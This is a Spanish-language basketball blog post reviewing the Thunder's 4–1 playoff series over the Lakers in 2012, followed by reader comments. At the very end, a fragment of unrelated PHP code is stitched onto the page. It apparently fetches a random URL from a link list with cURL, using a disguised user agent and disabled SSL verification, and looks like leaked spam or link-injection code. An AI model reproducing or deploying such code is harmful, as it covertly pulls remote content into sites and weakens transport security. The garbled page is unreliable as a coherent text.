Resumen Oklahoma City Thunder 4 – L.A. Lakers 1

24 de May de 2012 por MagicJohnson32

kdkbEstaba escrito. En algún viejo libro, de tapas ajadas y páginas amarillentas, el destino había escrito de su puño y letra que Oklahoma City Thunder sería el rival de los San Antonio Spurs en las finales del Oeste 2012. Era inevitable. Los Mavericks, pese a quedar a un paso de la victoria hasta en tres partidos, acabaron barridos en primera ronda. Y en segunda, los Lakers desperdiciaron dos ocasiones clarísimas y compitieron en casi todo momento (salvo por el primer partido y la debacle al final del quinto), pero sacaron un único triunfo. Los esfuerzos de los dos últimos campeones fueron en vano.

Algo tienen estos Thunder que a cada apuro que se les presenta responden como los grandes. Y quien dice “algo”, dice Kevin Durant. El máximo anotador de la temporada ha liderado a su equipo en remontadas de lo más improbables y ha hecho pagar a sus rivales un precio muy alto por cada error cometido. Ni siquiera han necesitado los Thunder hacer su mejor juego para tumbar a los Lakers, que han comprobado que no disponen de los recursos necesarios ante un adversario de primera categoría. Y lo peor, lo que ha desatado la crisis que estos días afecta a la franquicia angelina, es que realmente pensaban que sí los tenían: pensaban que tenían un base capaz de frenar a Westbrook, o al menos de aportar consistentemente en ataque; pensaban que tenían un juego interior verdaderamente imponente, que dominaría ambas zonas, intimidaría y controlaría el rebote; pensaban que tenían al defensor idóneo para Kevin Durant; y, claro, pensaban que siempre podían echar mano del talento y la anotación que garantiza Kobe. Pocas de todas esas presunciones se han confirmado a lo largo de la eliminatoria.

Sessions ha naufragado estrepitosamente en estos, sus Playoffs de debut. Todo el impacto positivo que tuvo a su llegada a L.A., la confianza que tenía en su tiro y sus penetraciones, todo desapareció conforme avanzaba la postemporada, y ante los Thunder hemos visto un jugador acogotado, claramente sobrepasado por las circunstancias y por Westbrook.

pauibakaBynum y Gasol no han dominado, al menos no con la consistencia y el impacto que requieren estos Lakers, tan dependientes de lo que hagan sus estrellas. La dureza y el sacrificio de Perkins e Ibaka, incluso la inyección de energía que aportaba Nick Collison desde el banquillo, han hecho mella en el rendimiento de la mejor pareja interior de la liga. Tanto uno como otro han visto reducidas sus aportaciones y su efectividad, y en varios momentos, como ya sucediera en la eliminatoria ante Denver, han mostrado una apatía sonrojante. Sus casos son diferentes pero tanto Bynum como Gasol quedan tocados. El joven pívot probablemente se salvará de la purga por su proyección y la protección de Jim Buss, responsable de su elección en el draft y verdadero hombre fuerte de la franquicia, y se le perdonarán sus desplantes y chiquilladas varias, así como su lamentable actuación en el quinto y definitivo partido. A Gasol, por tanto, le corresponden todos los números para ser la principal moneda de cambio de los Lakers en el mercado de cara a recomponer la plantilla. Poco ha ayudado la dirección de Mike Brown, y menos aún ha hecho Pau, de cara a reforzar su papel en el futuro inmediato de los Lakers. Por mucho que se haya sentido arrinconado, el fabuloso jugador catalán no ha sabido sacudirse la tibieza en su juego y con demasiada frecuencia daba la impresión de refugiarse en el papel secundario al que se ha visto relegado.

Por su parte, Metta World Peace, quien regresó de su sanción en plan salvador para el séptimo partido ante los Nuggets, ha hecho cuanto ha podido frente a Durant. Con MWP convertido en su sombra, KD ha mostrado una madurez extraordinaria a lo largo de la serie, ha sabido aguardar siempre al momento preciso y, cada vez que su equipo lo ha necesitado, ha aparecido para asestar el golpe de gracia al rival. Sus canastas ganadoras en el segundo y el cuarto partido supusieron la diferencia entre lo que pudo ser -una serie larga de resultado incierto- y lo que fue. Por supuesto, si Durant se ha permitido esta manera de afrontar la eliminatoria es porque Westbrook y Harden se han sobrado para llevar el peso del juego en muchas fases de los partidos. El mejor sexto hombre de la liga ha ejercido como tal y sus aportaciones han resultado fundamentales, más aún en comparación con las del banquillo de los Lakers. De Westbrook ya hemos dicho que ha superado en todo momento a su par, pero hay una estadística que ilustra claramente su papel: en los cinco partidos de la eliminatoria, el base ha cometido únicamente cuatro pérdidas. Los Lakers, por tanto, no han podido ni sabido sacar provecho de la principal falta de estos Thunder, que han sido el equipo que más balones ha perdido esta campaña.

De todas las presunciones que asumían los Lakers de entrada, la única que se ha materializado es la de la anotación de Bryant, que ha promediado 31 puntos por partido, más de la tercera parte de los de su equipo. Por momentos heroico y casi siempre muy solo, sus errores al final del segundo y cuarto partido marcan decisivamente una actuación en la que Bryant se sobrepuso a la excelente defensa de Sefolosha y Harden pero en la que acabó sucumbiendo ante Durant, la fatiga y la incapacidad de Brown para aportar soluciones desde la pizarra. Falló Bryant y no encontró expiación de la mano de sus compañeros, con aquel triple abierto de Blake que pudo ganar el segundo partido y con la lamentable pérdida de Gasol a 30 segundos para la conclusión del cuarto encuentro y el partido empatado. Por si no tenían enfrente un rival de suficiente alcurnia, los Lakers volvieron a aliarse contra sí mismos.

durant winPREMIOS

MVP: La trascendencia de Kevin Durant en la eliminatoria va mucho más allá de lo que indican sus excelentes números, cerca de 27 puntos y 8.6 rebotes de media. Su liderazgo, su lectura y su capacidad para aparecer y decidir solo están al alcance de los más grandes.

La sorpresa: Sabíamos de la incapacidad de los Lakers para forzar pérdidas a sus rivales, pero sorprende comprobar que Russell Westbrook, tras promediar 3.6 balones perdidos por partido durante la temporada, los ha reducido a 0.8 en esta eliminatoria.

La decepción:  Hasta el último momento esperábamos un golpe de carácter y genio por parte de Pau Gasol, una actuación al nivel de aquella con la que nos deleitó en el séptimo partido de la primera ronda. Esta vez no llegó. No ha superado los 14 puntos, sus porcentajes de acierto han caído al 44% y, salvo por un par de tiros libres anotados en los últimos minutos de la única victoria de los Lakers, se hizo invisible en los finales ajustados.

El mayor esfuerzo en vano: Al contrario que Gasol, cuando Bryant falla lo hace por exceso y no por defecto. No se ha escondido, no se ha reservado lo más mínimo (ni Mike Brown ha sabido reservarlo) y eso le ha pasado factura en los finales de partido. Pero sus 31.2 puntos, 5.2 rebotes y 3.4 asistencias por noche han sido, sin lugar a dudas, la mayor contribución de cualquier jugador de los Lakers.

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. shaggy dice:
    #1

    MagicJohnson32 sera 8,6 rebotes de media no?? porque si son asistencias KD es mejor base que Westbrook

      Citar

  2. MagicJohnson32 dice:
    #2

    shaggy:
    MagicJohnson32 sera 8,6 rebotes de media no?? porque si son asistencias KD es mejor base que Westbrook

    Era una prueba, a ver si estabais atentos. Has aprobado.

    PD: Aunque no te creas. Salvo por el primer partido, en el que Westbrook repartió 9 asistencias, los números de uno y otro en ese apartado son muy similares.

      Citar

  3. Nacho dice:
    #3

    Ufff, no sé qué pensar de la crónica. Pero no estoy de acuerdo en la mayor.
    Decepción, Mike Brown, y luego Bynum, Gasol y Bryant a partes iguales.
    Que Bryant sabe hacer puntos es algo obvio, pero a parte de los puntos, hay que saber cómo jugar, y no creo que haya sabido. Y que conste que es, para mí, el mejor jugador ahora mismo. Más estético, más clave cuando está enchufado… (con permiso de Durant)
    En cuanto a la parte vencedora, creo que es obvio que Durant es la mega estrella, y se hace ahora el resumen por él, porque podrían estar jugando aún si no es por esa mano, y ese saber estar.
    Westbrook me ha sorprendido muy gratamente, y se ha mejorado horrores sobre el año pasado en PO.
    Discrepo un poco sobre lo de Hardem, creo que ha estado bien, pero no excelso.
    Los interiores muy bien, incluso los minutos de Mohammed.
    Y hay un factor claro que no lo hemos valorado lo bastante. Scott Brooks. Creo que ha leído muy bien los partidos, y ha sabido manejar los tiempos, y las defensas. Me ha sorprendido muy gratamente.
    Creo que él y Westbrook son los que salen más reforzados de esta serie. Y toda OKC, claro. No hablo de Durant, porque ha sido palabras mayores.
    Saludos.

      Citar

  4. nba dice:
    #4

    Sin quitar merito a Thunder, estos Lakers o al menos los de esta eliminatoria si se hubiesen enfrentado a unos “Bobcats” no tengo muy claro yo que fuesen capaz de ganarles.
    Respecto a Lakers, un entrenador con supuesta fama de especialista defensivo, y que es incapaz de que sus hombres defiendan el perimetro de manera razonable, salvo momentos puntuales de Bryant/MWP, dice mucho de su capacidad.
    De un Gasol en un estado de apatia/cansancio considerable, mira que he visto partidos de Pau en la NBA pero lo de estos playoffs es para darle de comer aparte, me decepciono que en el ultimo partido no tirase de jerarquia y nos demostrase de lo que todos sabemos que realmente es capaz.
    De un Bynum como siempre inconsistente , que ha hecho lo que ha podido con los balones que le han llegado.
    De un Bryant…., bueno dejemos a Bryant …
    De un Sessions que todos creiamos que aportaria mas, que habia momentos que se creia Iverson …, pero menudas mandarinas se tiraba el tio, y que defender que digamos no ha defendido mucho
    De un MWP , haciendo medianamente bien su trabajo , sin duda el que mas me ha gustado de esta serie
    De los suplentes, pues alguna mencion a Hill, Barnes, el resto aportando lo poco que suelen o les dejan aportar.

    De OKC, qué decir de Durant, Russell, Harden,Ibaka, si ya de por si son jovenes , encima con la ventaja de la frescura que llevan de la temporada y de los playoffs, y al no tener enfrente un equipo que les exigiese mucho en los momentos claves, pues se han podido permitir el lujo de sestear en los partidos.
    La eliminatoria Spurs-OKC va a ser apasionante

      Citar

  5. Ru dice:
    #5

    Como dije tiempo atrás,con 3 jugadores que rebosan talento y dos bastiones defensivos a los Thunder les sobra.No son el sumum del trabajo táctico si no que el equipo se presta para y por el talento de Durant,Westbrook y Harden.Y acojona pensar que pueden ser aún mejores (anotación en la pintura,que Durant utilice algo más que su envergadura a la hora de defender…) bajo mi modesta opinión.Lejos quedan los problemas entre Westbrook y Durant,parece que fue hace dos temporadas.

    En los Lakers,como en la crónica,estaba escrito.Crónica de una muerte anunciada.Supongo que no habrá revolución,seguirá Mike Brown,KB seguirá siendo el líder,Bynum estará protegido,al menos esta vez…y Gasol moneda de cambio.Creo que aún tiene bastante mercado pese a lo voluminoso de su contrato.A bote pronto,posibles escenarios:

    – Brooklyn Nets: imaginando que Deron no renueva,le pueden proponer un sign and trade si le convence ser un Laker.Y en este caso,creo que se les puede empaquetar el contrato de Artest,que dicho sea de paso su rendimiento me gusta,al menos el de la última parte de la temporada.Para Brooklyn no creo que sea un mal paso siempre y cuando no consigan atraer otros jugadores con mayor pedigrí.Personalmente,las Torres Gemelas blancas,Gasol & Brook López me pone,aunque el promedio reboteador puede asustar.

    – Atlanta (si Josh Smith sigue queriendo marcharse),Chicago(creo que necesitan algo más con la baja de Rose,en este caso intercambio por Boozer,al menos esa sería la base),Houston(el traspaso base del pasado verano metiendo un tercer equipo,Kevin Martin a los Wolves?¿). He leído también opciones como Miami,por Bosh,o Philadelphia,por Iguodala,no sé.

    A pesar de contar con Bryant creo que les hace falta un base muy bueno a estos Lakers,ya no es el juego del Big Three de tito Phil.Hay que recordar el equipo base de Mike Brown en los Cavs: Mo-Delonte-LeBron-Varejao-Ilgauskas.Mo en esa época era la segunda fuerza ofensiva del equipo y la tercera Ilgauskas,dejando a Delonte y Varejao el trabajo sucio.Por eso creo que con Deron tendrían mucho ganado.

      Citar

  6. Sancho88 dice:
    #6

    Yo no puedo hacer un análisis de esta eliminatoria porque apenas pude ver el primer partido, pero me ha parecido un análisis muy bueno, con mucho estilo y muy bien estructurado. Al final, como bien dices Magic, las cosas han caído por su propio peso y se ha impuesto la lógica. Efectivamente, el mayor error de Pau ha sido asumir el papel que le daba el entrenador, cuando todos sabemos que debía haber dado un puñetazo en la mesa y haber demostrado sus dos anillos, sus tres all-star, etc. Y no lo hizo, y por eso este verano se irá. Hay que reconocerlo. Sobre Kobe Bryant, poco se puede decir de él a estas alturas. Es el mayor talento en todo el mundo como jugador de baloncesto, pero su gran defecto es el juego colectivo, con Phil Jackson supo adaptarse al triángulo mágico y en muchas ocasiones daba la sensación de haber comprendido mucho mejor el juego, pero eso ha desaparecido tras la marcha del coach… una lástima. Ya digo, no se esconde, no se arruga, es muy muy bueno, eso es indudable, pero podía haber creado algo en el colectivo… no obstante, este asunto sería lo más secundario, lo más intrascendente, visto lo visto: un entrenador incompetente, un Pau Gasol desconocido que da la sensación de estar más cerca de su retirada que de un traspaso atractivo, y un Bynum con el ego por las nubes, las declaraciones de niñato y el juego un poco por el estilo. Se sabe intocable y en vez de proyectarlo en la cancha, se dedica a pavonearse en las zonas mixtas y a soltar tonterías por la boca… Artest un gran profesional, que si no fuera por su cabeza pasaría a la historia como uno de los grandes defensores de todos los tiempos, y el resto… pues muy poquito. Sessions ha demostrado lo que ya dijisteis todos por aquí, que en temporada regular podía rendir pero que no esperabais nada de él en PO. Tal cual. No sé, efectivamente era previsible esta eliminación, pero creo que lo que más nos ha sorprendido de todo esto han sido las formas, más que el fondo. Con partidos ganados que hubieran llevado esta eliminatoria como mínimo al séptimo partido, Lakers lo dejó tirar por la borda y Thunder no perdonó.

    Desde luego, algo especial parece depararles el destino a estos Thunder, y para mí, por nivel de juego, de jugadores y de favoritismo, Thunder@Spurs es la final anticipada, aunque si Bosh vuelve con Heat, la final final también va a estar muy bien.

    Genial análisis Magic!!

      Citar

  7. Sancho88 dice:
    #7

    Perdón, Pau tiene cuatro all-star, no tres como he dicho… Y una cosa que se me olvidaba: Rusell Westbrook. No sabía el dato de sus pérdidas, pero me ha sorprendido gratamente por una parte, ya que demuestra que jugando concentrado puede ser uno de los tres mejores bases del mundo, y me ha sorprendido para mal, porque dice muy poco de la defensa de los Lakers, y sobre todo, del “gran” especialista defensivo de los escupitajos… dios, Pau fuera, pero Marrón que salga detrás, cierre la puerta y no vuelva nunca. Pau podrá volver siempre que quiera y todo el mundo se acordará de los dos anillos, a pesar de que su final ha sido de mierda, pero este pavo… ni de coña. Se dice que el público de Lakers es muy pasivo, que van a pasar la tarde, pero si esto hubiera sucedido en Europa las pitadas a ese señor habrían sido de órdago, no creeis?

      Citar

  8. sempren dice:
    #8

    Varias reflexiones…

    ¿Podríamos decir que Durant ha dado un paso adelante en lo que se refiere a la defensa? Siempre había sido uno de los peros que se le ponían, sobre todo porque tiene un físico envidiable, pero ha salido a defender a Kobe, y con no malos resultados.

    Westbrook ha sabido mejorar no solo sus pérdidas, sino también (al menos por sensaciones mías, ignoro los datos) sus porcentajes de tiro, a menudo bastante discutibles en un jugador de su nivel. Sin tirarse mandarinas, y aunque la dirección del juego sea un poco a tres bandas, sí se puede considerar como una estrella de un equipo campeón.

    Las finales del oeste van a ser interesantísimas, los Spurs con su juego más colectivo en ambos lados de la cancha, con unos catedráticos en esto del baloncesto como Parker, Manudo y Duncan… contra Durant y los suyos.

    Gran diferencia entre el final de la regular y los PO. Decíais (y veíamos) unos Lakers con más equipo y banquillo, por la aportación de Sessions, Barnes y Hill (el alero había estado muy bien en ausencia de Kobe, además de llevar buenos números en la parte final de la temporada), pero al final se quedó todo en nada, solo Hill pudo aportar con irregularidad. Blake mejoró respecto a su habitual, pero eso tampoco es ninguna maravilla.

    Vistos los problemas de uno y otro equipo, sería ideal para Lakers este año haber contado con Bosh, para jugar más abierto, y también para los Heat tener a un PF-C más potente como Gasol. Lo llevo pensando varios días, pero ya me di cuenta de que seguramente es inviable por culpa del salario de Pau, inasumible en Florida.

      Citar

  9. GreenPride dice:
    #9

    Pues eliminatoria en principio apasionante que se nos ha quedado un poquito corta.
    Por los ganadores destacar cómo parecen haber madurado desde hace 2 años ahora. En esa maduración hay que hablar sobre todo de sus 3 espadas.
    Westbrook ha aprendido a controlarse, ha mejorado su tiro de media distancia con lo que ha dejado de penetrar cada vez para forzar cada tiro y ha empezado a darse cuenta de que en los momentos clutch puede ser decisivo sin amasar la pelota. En sus 4 pérdidas en 5 partidos (Estadística increíble) también tiene mucho que ver la defensa laker pero mucho ha tenido que ver su manera de jugar también, tan distinta a la del año pasado en PO. Veremos si confirma su madurez contra una defensa mucho más activa como la de los Spurs.
    Harden ha pasado de buen reserva a mejor sexto hombre. Un jugador muy creativo, con gran manejo de balón y que ha dado a los Lakers grandes problemas a la hora de pararle como ya esperábamos en la previa. Ha sido algo menos decisivo de lo que yo esperaba, sobre todo en los partidos en LA, pero ha dejado su personalidad llevando las riendas del ataque thunder en muchos minutos.
    Y por fin el gran hombre, Durantula. En esta serie ha demostrado cómo ha mejorado en su conocimiento del juego. Si hace dos años sus porcentajes ante MWP fueron horribles y la ansiedad le podía muchas veces, ahora ha sabido esperar sus momentos, no forzar los tiros y estar preparado para aprovechar con su impresionante clase. Esto le permite llegar a los finales más descansado y mejorar su defensa, ambas cosas se han mostrado decisivas en esta serie. El jugador clutch de estos PO por el momento sin duda. Para mí lo que asusta es que aún podría mejorar si utilizase de vez en cuando su altura y largos brazos para postear a sus defensores pero está claro que estamos ante un jugador de leyenda.
    Y ahora los Lakers. Al principio de la temporada casi todos sospechábamos de Mike Brown como relevo de Phil Jackson. Las sospechas han quedado confirmadas. Su sello es su defensa y en esta serie no ha estado todo lo bien que debería pero es en ataque donde se descubren sus carencias. Ha sido incapaz de sacar todo el partido a un jugador decisivo como Pau y no ha acabado de hacer a Bynum sacar todo lo que tiene. En los momentos calientes no ha sido capaz de convencer al equipo de que se puede hacer algo diferente a dar la bola a Kobe y así les ha ido, con ataques horribles en casi todas las últimas posesiones.
    En cuanto a los jugadores, decepcionantes Pau y Bynum. El peso debería caer sobre ambos. Pau no ha sabido sobreponerse al esquema de Brown y ha acabado totalmente fuera de ritmo ofensivo, con porcentajes horribles y sin agresividad ni confianza, de ahí situaciones como el famoso pase perdido en el 4º. Bynum parece que nunca madurará. Alterna grandes momentos con desapariciones graves y una actitud más que discutible. Lástima porque tiene cualidades para ser el mejor pivot de la competición.
    En cuanto a Bryant, más de lo mismo de siempre. Gran clase pero cuando no confía en los sistemas se vuelve un chupón, lo que no beneficia al equipo ni a él que llega reventado al final de los partidos. Jackson consiguió que entendiera que debía pensar en el equipo, Brown no lo ha hecho y se le acaba el tiempo para igualar los 6 anillos del gran MIchael.
    En cuanto a los meritorios, aceptable parte final del año de MWP. Si no se le fuera tanto la olla sería aún más importante. Fatal Sessions, totalmente superado, acojonado en estos PO, la gran decepción. Blake da lo que tiene, igual que Barnes y Hill.
    Ahora espera un verano movidito en LA. Todos apuntan a un trade con Pau de protagonista pero su alto contrato (que sube un 15% si es traspasado) no va a ayudar a conseguir un trade en condiciones como ya ocurriese el pasado verano. Difícil panorama para Kupchack teniendo en cuenta que hay bastantes equipos además con espacio salariarl para el verano.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>